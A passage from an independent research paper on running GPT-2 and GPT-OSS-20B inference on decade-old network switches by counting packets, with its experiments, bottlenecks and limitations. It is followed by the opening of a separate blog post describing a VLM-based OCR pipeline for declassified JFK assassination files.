The six matrix multiplications (Q, K, V, O, FFN-up, FFN-down) execute on switches using the batch encoding scheme from Section 3.5. Residuals execute for free. RMSNorm and activations require one counter read each, or can be fused into packet generation to eliminate reads.

**Experiment 59** validated a complete transformer block with 5 matrix multiplies on switch (V=100, O=56, gate=608, up=349, down=132) and 100% CPU-switch match on all projections using 576 TCAM rules for one block.


## 5. System Architecture and Implementation

This section describes the complete system architecture, including the hardware topology, packet transmission pipeline, and counter reading mechanisms.

### 5.1 Hardware Configuration

The test system consists of:
- 2× Juniper QFX5100-96S switches ($250 each, purchased used)
- 1× Mellanox ConnectX-3 dual-port 40GbE NIC ($52)
- 1× Dell OptiPlex 7050 host (Core i5-7500, 16GB RAM, $160)
- 3× 40GbE QSFP+ direct-attach cables ($33 each)

The switches connect via two 40 Gbps trunks providing 80 Gbps inter-switch bandwidth. The host connects to both switches via the dual-port NIC, allowing independent packet streams to each switch. Total hardware cost: $849 (individual switch cost of $250 cited in abstract refers to switch hardware only; full system including NIC, host, and cabling totals $849).

The Juniper QFX5100 uses a Broadcom Trident II ASIC supporting 96 × 10GbE or 8 × 40GbE ports with 1.28 Tbps aggregate throughput. Each switch has approximately 1,152 TCAM entries per firewall filter with a hardware limit of 3 filters active simultaneously. Counter increments occur in the ASIC at line rate (billions of packets per second), but reading counters requires SSH or SNMP queries to the control-plane CPU.

### 5.2 Software Stack

The implementation uses Python 3.11 with the following key components:

**Weight Loading**: GGUF format readers using the `gguf` library (version 0.10.0) to load quantized weights from Hugging Face model files. Q4_K_M quantization provides 4-bit weights with per-block scaling factors. For GPT-OSS-20B, I implemented custom dequantization for GGUF type 39 (MXFP4).

**Packet Generation**: Scapy library for packet crafting with Ethernet headers and VLAN tags. Each packet is 64 bytes minimum (Ethernet + VLAN + padding). Packets are pre-generated in memory before transmission to minimize per-packet overhead.

**DPDK Transmission**: For high-speed packet transmission, I use DPDK 21.11 with the MLX4 Poll Mode Driver. The system compiles a custom C program at runtime that reads pre-generated packets from a binary file and transmits them using DPDK APIs. This achieves 14.2M packets per second compared to 650K pps using standard Python sockets.

**Switch Configuration**: Junos configuration commands sent via SSH using Paramiko. Large configurations (>1000 commands) transfer as files using SCP, then load via `load override` or `load merge` commands to avoid SSH session timeouts.

### 5.3 Packet Transmission Pipeline

The packet generation and transmission pipeline operates in batches per projection:

```python
1. Quantize input activations: x_quant = round(abs(x) / input_scale)
2. For each output neuron i:
   a. For each input neuron j where weight[i,j] ≠ 0:
      - Compute contribution = abs(weight[i,j]) * x_quant[j]
      - If contribution < threshold: skip (sparsity optimization)
      - Determine sign: positive or negative MAC prefix
      - Generate contribution number of packets
3. Write packets to temporary binary file
4. Invoke DPDK sender program
5. DPDK program loads packets and transmits at line rate
```

**Contribution Thresholding**: I skip packets where |weight| × |activation| falls below a projection-specific threshold (Q/K/V: 3.0, O: 2.0, FFN: 1.0). This exploits natural sparsity in quantized networks, reducing packet count by ~44% with negligible accuracy loss.

**Experiment 156** validated contribution thresholding with 44% packet reduction (168,849 → 94,126 packets per projection), 79% overall sparsity, and zero accuracy loss (same output token and logit as without thresholding).

### 5.4 Counter Reading Mechanisms

I implemented and evaluated three counter reading approaches:

**SSH-based Reading (Baseline)**: Execute `show firewall filter <name>` via SSH and parse the text output. Each read takes 2-3 seconds due to control-plane overhead. For a 6-projection transformer layer, this contributes ~15 seconds per layer. This was the primary bottleneck in the GPT-OSS-20B experiment (92 seconds per layer, with ~12 seconds for packet transmission and ~80 seconds for counter reads).

**Packet-based Forwarding (87× faster)**: Configure firewall filter action to forward packets to the host instead of just counting them. The host runs a packet receiver that counts packets by destination MAC address. After transmission completes, the host has already received and counted all packets, eliminating the need for SSH queries. **Experiment 87** demonstrated 8.5ms vs 742.8ms (87× speedup) with 100% accuracy on all counters.

**Port Mirroring (70× faster)**: Configure firewall filter action to mirror matched packets to a specific port connected to the host. Similar to forwarding but preserves original packet forwarding behavior. **Experiment 87** showed 10.3ms vs 724.6ms (70× speedup).

The packet-based approaches were validated but not integrated into the full GPT-OSS-20B pipeline due to implementation complexity. Future work should prioritize this integration as it eliminates the primary performance bottleneck.

### 5.5 Multi-Layer Processing

For models with multiple transformer layers, I use the snake architecture (Section 3.6) to minimize host round-trips. The processing flow for a 24-layer model is:

```
1. Configure both switches with all 24 layers (one-time setup)
2. Load input token embedding
3. For layer L in [0..23]:
   a. Clear counters for layer L
   b. Generate packets with VLAN=L, MAC layer byte=L
   c. Send all 6 projections' packets (Q,K,V,O,FFN-up,FFN-down)
   d. Read counters for layer L via SSH
   e. Dequantize results
   f. Apply RMSNorm and activations on host
   g. Use output as input for layer L+1
4. Compute LM head projection
5. Return argmax token
```

The snake architecture eliminates inter-layer packet forwarding delays but does not eliminate the per-layer counter reading bottleneck. Each layer still requires 6 SSH reads (one per projection) consuming the majority of latency.

### 5.6 Hierarchical LM Head

The final vocabulary projection (hidden state to 50,257 logits for GPT-2) would require processing all vocabulary entries on the switch. I developed a two-stage approach:

**Stage 1 (Host)**: Partition vocabulary into buckets of 512 tokens each (99 buckets total). Compute 99 small matmuls (hidden_dim × 512) on the CPU to find the maximum logit across each bucket. This takes ~2ms using NumPy.

**Stage 2 (Switch)**: Send packets only for the winning bucket's 512 tokens to the switch. The switch computes exact logits for this subset. Read 512 counters and find the argmax.

This eliminates 98 of 99 switch reads, reducing LM head computation from 74 minutes (processing all 50,257 tokens sequentially) to 45 seconds. Combined with packet-based counter reading, the LM head could theoretically complete in ~50ms.

**Experiment 129** validated hierarchical LM head with 99× speedup and 100% accuracy on argmax token selection across all test vectors.


## 6. Evaluation

This section validates the core claim: that neural network inference primitives can be completely mapped to switch packet-processing operations for large-scale models. I evaluated the system across three increasingly complex configurations: proof-of-concept validation of the fundamental matrix multiplication primitive, GPT-2 demonstrating architectural completeness, and GPT-OSS-20B dimensions demonstrating the approach scales to modern large language model architectures.

The evaluation focuses on three questions:
1. **Correctness**: Do switch-based operations produce numerically correct results matching CPU baselines?
2. **Completeness**: Can all transformer operations execute using only packet-counting primitives?
3. **Scalability**: What are the bottlenecks, and are they fundamental or hardware-specific?

All experiments use the Juniper QFX5100 hardware configuration described in Section 5.1. Performance numbers reflect the limitations of decade-old commodity hardware and serve to identify bottlenecks rather than demonstrate competitive throughput.

### 6.1 Proof-of-Concept: 4×4 Matrix Multiplication

**Experiment 31** validated the core matrix multiplication primitive with a 4×4 weight matrix (56% sparse) and input vector x = [3, 2, 4, 1]. The system sent 24 packets total and produced output [7, 7, 5, 5] matching the CPU baseline exactly (100% accuracy). This confirmed that TCAM-encoded weights, packet-counted activations, and switch counter accumulation correctly implement matrix multiplication.

### 6.2 GPT-2: Architectural Completeness Validation

**Experiment 144** integrated all architectural innovations to run complete GPT-2 inference at full 768-dimensional resolution across all 12 layers. The configuration used:
- Batch encoding with /40 prefix matching: 24 TCAM terms total (384× reduction vs 9,216 traditional)
- DPDK kernel bypass: sustained 10.6-11.2M packets per second
- Hierarchical LM head: 98.4ms for 50,257 vocabulary
- Real GPT-2 124M weights from Q4_K_M GGUF quantization

Processing input token 464 ("The") through all 12 transformer layers took 933.98 seconds (averaging 77.83 seconds per layer) and generated next token 49262 with logit 50.9. The system maintained numerical stability throughout with no overflow or underflow errors.

**Performance Breakdown per Layer**:
- Packet generation: ~5 seconds (preparing 15M+ packets)
- Packet transmission: ~2 seconds (at 10.6M pps)
- Counter reading: ~70 seconds (6 projections × ~12 seconds per SSH read)

The counter reading bottleneck consumed 90% of per-layer time. Packet transmission used only 5.66 Gbps of the available 40 Gbps link (14% utilization), indicating the switching fabric was not saturated.

**TCAM Efficiency**: The 24 TCAM terms supported unlimited layers through sequential processing. Adding more layers increases inference time linearly but requires no additional TCAM configuration, proving the architecture scales beyond hardware limits.

### 6.3 GPT-OSS-20B: Architectural Scaling Demonstration

**Experiment 160** demonstrated end-to-end inference on a 20 billion parameter model architecture with 2880-dimensional hidden states across 24 layers. The implementation uses a dense approximation: all 32 mixture-of-experts per layer are averaged into single effective weight matrices (W_avg = (1/32)Σ W_expert_i) rather than implementing dynamic top-k routing. This eliminates the conditional computation benefits of MoE but validates that the architecture can handle MoE-scale weight dimensions (32 experts × 2880×2880). The model architecture included:
- Grouped Query Attention: Q=4096d, K/V=512d (concatenated to 5120d total for QKV projection)
- Mixture-of-Experts: 32 experts per layer, averaged into single effective weight matrices
- Full dimensionality: no dimension reduction, all 2880×2880 weight matrices

The system processed 756 million packets over 2212 seconds (36.87 minutes), averaging 92.17 seconds per layer. Packet counts varied dramatically by layer due to contribution thresholding:
- Early layers (0-5): 20M-60M packets per layer (high activation magnitudes)
- Middle layers (6-17): 10M-40M packets per layer
- Late layers (18-23): 640K-3.5M packets per layer (sparse activations after thresholding)

**Numerical Stability**: Throughout all 24 layers, hidden states remained well-behaved:
- Layer 0 output: mean=-0.46, std=28.12
- Layer 12 output: mean=-0.13, std=15.89
- Layer 23 output: mean=-0.01, std=15.78

These statistics demonstrate proper numerical behavior: means near zero indicate balanced positive/negative values without systematic bias, and stable standard deviations (converging toward ~16) show no accumulation of quantization error or numerical drift across layers. For comparison, CPU inference on similar quantized models shows comparable hidden state statistics, suggesting the switch implementation maintains numerical fidelity despite aggressive 4-bit quantization.

The final hidden state generated token 97965 with logit 9751.9. Token outputs are validated for numerical stability and reasonable logit magnitudes but not compared against CPU baselines for exact token-by-token agreement.

**Performance Analysis**:
- Average packet transmission: 1.4-2.0 seconds per layer (varies with packet count)
- Average counter reading: ~90 seconds per layer (6 SSH reads × 15 seconds each)
- Total per-layer time: 92.17 seconds
- Estimated with packet-based counters: ~2 seconds per layer (87× speedup on reads)

### 6.4 Bottleneck Analysis

Performance profiling across all experiments identified three distinct bottlenecks:

**1. Counter Reading (Control Plane): 90% of latency**

SSH-based counter reads dominate total time. For GPT-OSS-20B, each layer requires 6 counter reads at ~15 seconds each, consuming 90 seconds per layer. The 24-layer model spends 2160 seconds (36 minutes) on counter reads vs. only 50 seconds on packet transmission and switching.

**Evidence**: In Experiment 147, optimizing packet transmission from sequential to parallel Q/K/V processing yielded only 1.09× speedup because transmission time was already small compared to SSH overhead.

**Solution**: Packet-based counter encoding (Experiment 87) achieves 87× speedup by moving counter reads to the data plane. Projected GPT-OSS-20B time with this optimization: ~90 seconds total (from 2212 seconds), or 3.75 seconds per layer.

**2. Packet Transmission Rate: 10-15% of latency**

At 14.2M packets per second (DPDK), transmitting 20-60M packets requires 1.4-4.2 seconds. This scales linearly with packet count and represents a hard limit based on NIC capabilities.

**Evidence**: Layer 18 (640K packets) took 63 seconds total, nearly identical to Layer 0 (20M packets) at 62.7 seconds, proving transmission time was not the bottleneck.

**Solution**: Higher packet rates require either (1) faster NICs (100 GbE at higher pps), (2) reduced packets through byte-based encoding (Experiment 148 showed 17.5× reduction but incompatible with batch encoding), or (3) P4 switches with stateful registers enabling one packet per value instead of N packets per value.

**3. Quantization Error: Affects accuracy, not latency**

4-bit weight quantization combined with dynamic activation scaling introduces approximation error. Batch encoding with /40 prefix matching adds additional error by aggregating neurons. Total error in Experiment 143: 21% (79% accuracy).

**Evidence**: Experiment 138 showed transformer block correlations degrading through the FFN chain (Q/K/V: 99%, O: 99.4%, U: 92%, D: 96.4%) due to accumulated quantization error at 32d. At 64d, correlations dropped further (O: 95%, U: 42%, D: 64%).

**Solution**: Higher-bit quantization (8-bit instead of 4-bit) or refined scaling strategies. However, more bits per weight increases packet count proportionally, worsening the transmission rate bottleneck.

### 6.5 Comparison to Related Work

**SwitchML** (2021) uses switches for gradient aggregation in distributed training, performing element-wise addition across worker nodes. This work demonstrates matrix multiplication and complete transformer inference, a strictly more complex operation requiring systematic mapping of all neural primitives to packet operations.

**P4 Neural Networks** (2024) implement small decision tree classifiers (~100KB models) for traffic analysis. This work scales to 20B parameter transformers with 2880-dimensional hidden states, several orders of magnitude larger.

**Broadcom Trident 5-X12** (2023) includes on-chip ML inference via NetGNT, a separate ML accelerator. This work repurposes the switching fabric itself for computation, not auxiliary accelerators.

### 6.6 Performance Analysis and Projections

**Validated Results on Commodity Hardware (Juniper QFX5100, 2015)**:
- Current baseline: 92 seconds/layer on GPT-OSS-20B dimensions
  - Counter reading (SSH control plane): ~90 seconds/layer (98% of time)
  - Packet transmission (data plane): ~2 seconds/layer (2% of time)
  
- With packet-based counters (Experiment 87, validated with 100% accuracy): 87× speedup on counter reads
  - Projected per-layer time: ~2-3 seconds (dominated by packet transmission)
  - Projected GPT-OSS-20B total: ~60 seconds for 24 layers
  - **Status**: Validated technique, not yet integrated into full pipeline

This validated improvement demonstrates that control-plane access, not switching fabric capacity, is the bottleneck on current hardware.

**Speculative Projections on Modern P4 Switches (unvalidated)**:

Modern P4-programmable switches (Tofino, Tofino2) provide capabilities absent in the Juniper QFX5100:
- Stateful registers supporting arithmetic operations (enabling 1 packet per value instead of N packets)
- Data-plane counter access (eliminating control-plane round-trips)
- Larger TCAM tables (reducing batch aggregation)
- Higher throughput (1.28 Tbps → 12.8 Tbps)

Theoretical performance based on extrapolation from validated components:
- 3× packet reduction from stateful registers (encoding value 15 as one packet with register += 15, rather than 15 packets)
- 1B pps transmission rate (Tofino2 specification at small packet sizes)
- Data-plane counter reads (validated 87× speedup in Experiment 87)
- Perfect pipelining with no CPU bottlenecks

**Estimated performance: 50-100 tokens/second for GPT-OSS-20B scale models**

**Important Caveat**: These projections extrapolate validated components (packet-based counters, stateful encoding principles) to untested hardware configurations. They represent plausible bounds based on vendor specifications and validated architectural patterns, but are speculative until experimentally confirmed on P4-capable hardware. Actual performance may encounter unforeseen bottlenecks not present in commodity switch experiments.

**Critical Distinction**: The validated work demonstrates that transformer inference can execute in switches using packet primitives (architectural feasibility). The projections estimate what performance modern switches could theoretically achieve (practical viability estimates), which remains to be experimentally validated.


## 7. Discussion and Limitations

This work demonstrates that switch-native LLM inference is architecturally feasible for large-scale models, with complete transformer execution on 20B parameter model dimensions using only packet-processing primitives. The validated experiments demonstrate that all neural network operations can be systematically mapped to the data plane. This section discusses the limitations of current commodity hardware and identifies the specific capabilities needed for practical deployment.

### 7.1 Current Hardware Limitations vs. Fundamental Constraints

It is critical to distinguish between limitations of the specific switches tested (Juniper QFX5100 from 2015) and fundamental architectural constraints of the approach:

**Hardware-Specific Limitations (addressable)**:
- SSH-based counter reading requires control-plane round-trips (validated 87× slowdown)
- No stateful registers, requiring N packets to encode value N
- Limited TCAM (1,152 entries), requiring batch aggregation
- NIC packet rate limited to 14.2M pps with DPDK

**Fundamental Approach Characteristics**:
- Packet count encodes value magnitude (intrinsic to the encoding)
- Computation is sequential through switch pipeline (inherent to packet processing)
- Integer operations only (no floating-point in data plane)

The key finding from 160+ experiments is that the hardware-specific limitations dominate performance, not the fundamental characteristics. Packet transmission consumed only 2 seconds per layer while control-plane access consumed 92 seconds per layer, demonstrating that the data-plane processing itself is fast—it's the interface to that processing that is slow on commodity hardware.

### 7.2 The Packet-Rate Wall and Stateful Register Solution

The core architectural constraint is that packet count encodes value magnitude. A weight of 5 multiplied by an activation of 10 requires sending 50 packets. For a 2880×2880 matrix multiplication with average 4-bit weight magnitude of 3 and average activation magnitude of 5, approximately 25 million packets are needed per projection. At 14.2M packets per second, this requires 1.76 seconds just for transmission.

This packet-rate wall is fundamental to the encoding scheme on non-programmable switches. The Broadcom Trident II ASIC can forward packets at line rate (up to 1.28 Tbps), but the NIC sending packets cannot generate them fast enough to saturate the switch. Even at 40 Gbps with 64-byte packets, theoretical maximum is 78.1M packets per second, but the Mellanox ConnectX-3 achieves only 14.2M pps due to DPDK and driver limitations.

**P4 programmable switches** eliminate this constraint by supporting stateful registers. Instead of sending N packets to encode value N, a P4 switch can parse a single packet containing value N and execute `register[index] += N` directly. This reduces packet count by the average value magnitude (typically 3-10×), bringing transmission time below 200ms per layer.

### 7.2 Control Plane vs Data Plane

The 87× performance gap between SSH counter reads (742ms) and packet-based counter reads (8.5ms) highlights the importance of data-plane operations. The switch ASIC can increment counters at billions of packets per second, but reading those counters requires a round-trip through the slow control-plane CPU running Linux and the Junos operating system.

Packet-based counter encoding (Experiment 87) solves this by having the switch forward counted packets back to the host, where the host counts them directly. This keeps counter reading in the data plane. However, implementing this for production requires:

1. Careful MAC address management to distinguish forwarded counters from regular packets
2. Multiple packet receivers on the host to handle different layers/projections
3. Synchronization between packet generation and reception to avoid race conditions

These implementation complexities prevented full integration into the GPT-OSS-20B experiment, but the 87× speedup makes this the highest-priority optimization for future work.

### 7.3 Quantization and Accuracy

4-bit weight quantization was necessary to keep packet counts manageable but introduces approximation error. Testing at 32d showed good transformer block correlations (>90% for all projections), but at 64d the FFN chain degraded (U: 42%, D: 64% correlation). At full 768d, correlation was not measured but likely sufficient given that GPT-2 generated valid next-token predictions.

More aggressive quantization (1-bit ternary) produced incoherent outputs (Experiment 55), while 4-bit Q4_K_M produced coherent text on CPU. The switch-based inference operates at the edge of viable quantization precision. Higher bit depths (8-bit) would improve accuracy but double packet counts, worsening the transmission rate bottleneck.

Recent work on 2-bit quantization for LLMs (BitNet) suggests that switch-based inference could benefit from extremely low-bit models designed for that precision from scratch, rather than post-training quantization of models trained at fp16.

### 7.4 Architectural Limitations

**Memory Capacity**: The switch stores only weights, not activations. All intermediate activations reside on the host and must be sent as packets for each operation. This requires the host to have sufficient memory for activation storage (typically <1GB even for 20B parameter models).

**No Conditional Execution**: The switch cannot dynamically skip operations based on runtime values. For Mixture-of-Experts, I averaged all experts rather than implementing top-k routing. True sparse MoE would require the host to compute routing decisions and send packets only for selected experts.

**Limited TCAM**: The 1,152 TCAM term limit requires batch encoding to scale beyond toy models. Batch encoding loses per-neuron resolution, acceptable for aggregated results but problematic for operations requiring individual neuron values. Modern switches with larger TCAMs (e.g., Tofino with 128K entries) would reduce this constraint.

**No Floating Point**: All computation happens in integer packet counts. Floating-point operations (softmax division, RMSNorm square root) must occur on the host between switch operations. P4 switches with floating-point ALUs would eliminate some of these round-trips.

### 7.5 Alternative Architectures Not Explored

**Byte-Based Encoding** (Experiment 148): Encoding values in packet size instead of packet count achieved 17.5× packet reduction with perfect correlation (1.000). However, this approach was incompatible with batch encoding (/40 prefix matching), which requires all packets to the same batch to be indistinguishable. Byte-based encoding would require per-neuron TCAM terms, hitting the 1,152 limit at 576 neurons.

**Multiple Switches in Parallel**: The current architecture uses 2 switches sequentially (layers 0-11 on switch 1, layers 12-23 on switch 2). Using switches in parallel for different projections within the same layer could reduce latency by 6× (processing Q, K, V, O, FFN-up, FFN-down simultaneously). However, this increases hardware cost and complexity.

**FPGA Acceleration**: Hybrid switch+FPGA architectures like FENIX (2024) use switches for packet routing and FPGAs for computation. This work deliberately avoids external accelerators to evaluate what switches alone can accomplish.

### 7.6 Implications for Future Hardware

The validated results on decade-old commodity switches prove that switch-native inference is architecturally sound. Modern hardware with the identified capabilities would eliminate the current bottlenecks:

1. **Stateful registers with arithmetic operations** (P4): Enables 1 packet per value instead of N packets per value
2. **Data-plane counter reads**: Eliminates 87× slowdown from SSH round-trips
3. **Larger TCAM tables**: Reduces need for batch encoding, improving per-neuron accuracy
4. **Floating-point ALUs**: Eliminates host round-trips for softmax, RMSNorm, and other transcendental functions
5. **Higher packet rates**: Modern NICs supporting 100M+ pps would reduce transmission time proportionally

Modern programmable switches (Tofino, Tofino2) provide features 1-3, suggesting that switch-native inference at 50-100 tokens/second is achievable with existing hardware. Purpose-built switching ASICs incorporating all five features could potentially match or exceed GPU inference performance for memory-bound workloads.

**Summary**: The limitations identified in this work are characteristics of commodity hardware from 2015, not fundamental barriers to the approach. The validated 87× speedup from packet-based counters and the identification of stateful registers as the path to single-packet encoding provide a clear roadmap from architectural feasibility (demonstrated in this work) to practical deployment (achievable with modern programmable switches, pending validation).

### 7.7 Validation Scope and Methodology Limitations

This work prioritizes demonstrating architectural completeness—that all transformer operations can map to packet primitives—over achieving exact model fidelity or production-quality accuracy. Several methodological limitations should be considered when interpreting results:

**Mixture-of-Experts Simplification**: The GPT-OSS-20B implementation averages all 32 experts into a single effective weight matrix (W_avg = (1/32)Σ W_expert_i) rather than implementing dynamic top-k expert routing. This eliminates the conditional computation benefits of MoE (specialization, efficiency) and does not accurately represent how the original model processes inputs. The simplification serves to validate that the architecture can handle MoE-scale weight dimensions (32 experts × 2880×2880) using already-validated matrix multiplication primitives. Full MoE routing is implementable by having the host compute router logits and generate packets only for selected experts, but was not implemented due to complexity. **This means the system validated a dense approximation at GPT-OSS-20B dimensions, not the actual GPT-OSS-20B model with its mixture-of-experts routing.**

**Output Validation Methodology**: Token predictions from switch-based inference are validated for numerical stability (hidden state statistics, no overflow/underflow) but not compared token-by-token against CPU baselines running identical inputs through identical quantized weights. For GPT-2 (Experiment 144), the system generated token 49262 with logit 50.9; for GPT-OSS-20B (Experiment 160), token 97965 with logit 9751.9. The hidden state statistics demonstrate proper numerical behavior, but do not prove that switch-based matrix multiplication produces identical outputs to CPU-based computation at the token level. **Future work should implement CPU baselines with identical quantization schemes to validate token prediction accuracy.**

**Quantization Error Characterization**: While I report correlation metrics for individual operations (e.g., 79% accuracy with batch encoding in Experiment 143, 42-64% FFN correlation at 64d in Experiment 138), the end-to-end GPT-2 and GPT-OSS-20B runs lack comprehensive accuracy metrics such as perplexity measurements, token prediction accuracy rates on standard benchmarks, or quality comparisons against fp16 baselines. The aggressive 4-bit quantization necessary to keep packet counts manageable inherently introduces approximation error, but the magnitude of that error on downstream task performance is not quantified. **The hidden state statistics demonstrate numerical stability, not task-level accuracy.**

**Single-Token Generation Only**: All experiments validate single-token autoregressive generation (processing one token, predicting the next) rather than batch inference or long-context scenarios. The architecture supports sequence length >1 through the KV-cache mechanism, but memory capacity constraints (host must store all activations) and packet count scaling (increases linearly with sequence length) were not systematically evaluated. Practical deployment would require optimization for longer contexts.

**Performance Projections**: The estimated 50-100 tokens/second performance on modern P4 switches (Section 6.6) extrapolates from validated components (87× packet-based counter speedup, contribution thresholding) to untested hardware (Tofino stateful registers, 1B pps NICs). These projections represent plausible bounds based on vendor specifications and validated principles, but are speculative until experimentally confirmed on P4-capable hardware. **Actual performance may be significantly different and could encounter unforeseen bottlenecks.**

**Statistical Rigor**: Most experiments report single-run results without repeated trials or confidence intervals. The focus is on demonstrating architectural feasibility (can this operation execute at all?) rather than characterizing statistical performance (what is the mean/variance over many runs?). For the core claim—that packet primitives can implement transformer operations—single-run validation is sufficient, but performance claims would require more rigorous methodology.


## 8. Related Work

**In-Network Aggregation**: SwitchML uses programmable switches to aggregate gradients during distributed training by summing parameter updates from multiple workers. This involves element-wise addition across machines, not matrix multiplication. Sailfish and ATP extend this work with better fault tolerance and scaling. This work differs by implementing matrix multiplication and complete transformer inference, enabling single-node operation.

**In-Network Inference**: Recent work explores neural network inference on programmable switches. P4 Neural Network Switch (2024) implements decision tree classifiers for traffic analysis using P4 match-action tables, achieving line-rate packet classification. IN3 (2024) runs compressed neural networks in Tofino switches for DDoS detection. Brain-on-Switch (BoS) (2024) implements RNN and transformer models for traffic analysis using hybrid CPU-switch architectures. These works focus on small models (typically <1MB) for network monitoring tasks. This work scales to 20B parameter LLM architectures (20GB+), demonstrating that switches can handle general-purpose inference workloads at significantly larger scale.

**Specialized ML Accelerators**: Broadcom's Trident 5-X12 (2023) includes NetGNT, an on-chip ML inference engine running parallel to the packet-processing pipeline for congestion detection. NVIDIA's Spectrum-X switches integrate DPU acceleration for in-network collective operations. These approaches add dedicated ML hardware to switches rather than repurposing the switching fabric itself. This work demonstrates that the packet-forwarding ASIC can serve as the compute engine without auxiliary accelerators.

**Optical Neural Networks**: Coherent optical systems implement neural networks using optical interference and diffraction. While this work uses electronic switches with optical links (40GbE fiber), the computation remains electronic. True photonic computing using Mach-Zehnder interferometers or diffractive optical elements would offer substantially higher throughput but requires specialized photonic hardware.

**Analog Computing for ML**: ReRAM, memristor, and other analog compute substrates implement matrix multiplication through Ohm's law and Kirchhoff's current law. These approaches offer superior energy efficiency (sub-pJ per MAC) compared to digital switches (pJ-nJ per packet). However, analog approaches suffer from noise, limited precision, and manufacturing challenges. Switches provide digital precision with mature fabrication processes at the cost of higher energy consumption.

**Quantized Neural Networks**: BitNet (2023) and other 1-bit neural network architectures demonstrate that extreme quantization can work if models are trained at low precision from scratch. This work uses post-training quantization of fp16 models to 4-bit, which limits achievable accuracy. Training models specifically for 4-bit or 2-bit precision could improve switch-based inference quality without increasing packet counts.


## 9. Conclusion

This work establishes that commodity network switches can execute complete transformer inference for large-scale models by systematically mapping neural network primitives to packet-processing operations in the data plane. Packet counting—available in all switches—implements matrix multiplication, and that complex operations including attention mechanisms, nonlinear activations, and normalization layers can be realized through packet forwarding rules alone.

Testing on $250 Juniper QFX5100 switches from 2015 validated all transformer components across 160+ experiments. The system successfully executed end-to-end inference on GPT-2 (768d, 124M parameters) and a dense approximation of GPT-OSS-20B (2880d, 20B parameters), processing 756 million packets through 24 layers while maintaining numerical stability (mean=-0.006, std=15.784). This demonstrates the primitive mapping is both complete and numerically sound at the scale of modern language models.

**Architectural Feasibility**: The core question this work answers is not "are switches faster than GPUs?" but rather "can neural inference execute natively in the data plane using packet primitives?" The answer is yes for large-scale model dimensions. Key innovations include MAC prefix matching (256× TCAM reduction), batch encoding with sequential processing (9,216× reduction enabling arbitrary model scaling), snake architecture for automatic multi-layer routing, and hierarchical LM head (99× vocabulary projection speedup). These techniques allow switches with 1,152 TCAM entries to handle 20B parameter model dimensions that would naively require 829,440 entries.

**Bottleneck Characterization**: Experimental analysis identified that the switching fabric itself is not the limiting factor. Packet transmission consumed only 2 seconds per layer while SSH-based counter reading consumed 92 seconds per layer—a 46× difference. Validated experiments demonstrate that packet-based counter encoding achieves 87× speedup by moving reads to the data plane, demonstrating the bottleneck is control-plane access rather than switching capacity. This finding is critical: it shows that the fundamental approach is sound, and practical performance depends on hardware features (data-plane counter access, stateful registers) rather than switching throughput.

**Hardware Implications**: This work identifies specific capabilities needed for practical switch-native inference:
1. **Stateful registers with arithmetic operations** (P4): Enables single-packet value encoding instead of N packets per value
2. **Data-plane counter reads**: Eliminates 87× control-plane overhead
3. **Larger TCAM tables**: Reduces batch aggregation error
4. **Programmable parsing**: Allows arbitrary packet field interpretation for value encoding
5. **Higher packet rates**: Modern NICs at 100M+ pps would reduce transmission latency proportionally

Modern programmable switches (Tofino, Tofino2) provide features 1-4, suggesting that the architectural patterns validated in this work could achieve improved performance on current hardware, though experimental validation on P4 switches remains future work. Purpose-built switching ASICs incorporating all five features could potentially be competitive with GPU inference for memory-bound workloads.

**Broader Impact**: Network switches are fundamentally built for data movement rather than computation density—precisely the characteristic needed for memory-bound LLM inference. This work demonstrates that specialized architectures prioritizing data movement over raw FLOPS offer a viable alternative compute paradigm for exploration. Beyond performance, in-network inference enables architectural patterns impossible with traditional accelerators: privacy-preserving inference where data never leaves the network, zero-copy inference on streaming data, and compute collocated with data at network scale.

The fact that decade-old commodity hardware can execute 20B parameter model dimensions demonstrates switch-native neural network inference is architecturally feasible. Future work can look at integrating the validated 87× packet-based counter optimization, testing on modern P4 switches with stateful registers, implementing CPU baselines with identical quantization for token-level accuracy validation, and exploring switch-specific quantization strategies optimized for packet-count encoding.

---

**Acknowledgments**: This research was conducted independently without institutional affiliation or external funding. All hardware was purchased personally. 

**Code and Data Availability**: All experiment code, switch configurations, and detailed experiment logs (160+ experiments from proof-of-concept through full 20B-parameter inference) are publicly available in [this github repo](https://github.com/andrewcampi/in_network_matmul_and_llm_inference). The repository includes:
- Complete Python implementations for all 160+ experiments with progression from 4×4 matrix multiplication (e031) through full GPT-OSS-20B inference (e160)
- DPDK packet transmission utilities achieving 14.2M packets/second
- Switch configuration generation scripts for Junos firewall filters
- Weight loading utilities for GGUF quantized models (Q4_K_M, MXFP4)
- Detailed experiment logs documenting architectural discoveries and performance measurements
- Hardware setup documentation and topology configurations

The GPT-2 (124M parameters) and GPT-OSS-20B (20B parameters) model weights used are publicly available on Hugging Face. The Juniper QFX5100 switches and Mellanox ConnectX-3 NICs used in this work are commodity hardware available on secondary markets.

---

<!-- FILE: jfk.md -->

# JFK File Explorer

### Beyond the Data Dump: The Problem with "Accessible" Government Records

When the National Archives released the declassified JFK assassination documents, they fulfilled the letter of transparency law but fell short of its spirit. Yes, the files were technically "accessible" - but try searching through 130,000+ pages of scanned PDFs filled with handwritten notes, redactions, and 1960s typewritten reports. It's like being given access to a library where every book's pages have been scattered across the floor.

That problem isn't malicious - it's practical. Government agencies aren't in the business of creating user-friendly research interfaces. They release what they have, in the format they have it in. This creates a barrier between the public and declassified information. Raw data isn't the same as accessible knowledge.

That's exactly the problem I set out to solve with the JFK File Explorer. Instead of promoting conspiracy theories or cherry-picking quotes myself, I wanted to create a tool that would let researchers, journalists, and curious citizens interact with the actual primary source material in a meaningful way.


### The Technical Challenge: Running Concurrent VLMs for OCR over Several Days

Converting these documents into searchable format required solving several complex problems simultaneously. These weren't clean, digital-native PDFs - they were scans of decades-old paperwork, complete with handwritten annotations, stamps, redactions, and the inevitable degradation that comes with age.

Traditional OCR tools would have struggled with this content. Instead, I leveraged state-of-the-art Vision Language Models (VLMs) that can understand both the visual layout and contextual meaning of document content - essentially enabling AI to read like a human researcher would.

### The Multi-Stage Pipeline

My approach involved a carefully orchestrated five-stage process:

First was link extraction - I programmatically gathered URLs to all declassified PDFs from the National Archives website. This meant parsing through various file formats and handling special cases where the government had used different organizational schemes across different release years.

Next was mass PDF downloading - systematically pulling down every document to create a local repository. This step alone involved handling tens of thousands of unique PDF files, each requiring careful error handling and rate limiting to avoid overwhelming the government servers.

The third stage was image conversion - transforming each page of the PDFs into high-resolution images. This preprocessing step was crucial for the VLM analysis that would follow, ensuring the models had crisp, clear images to work with.

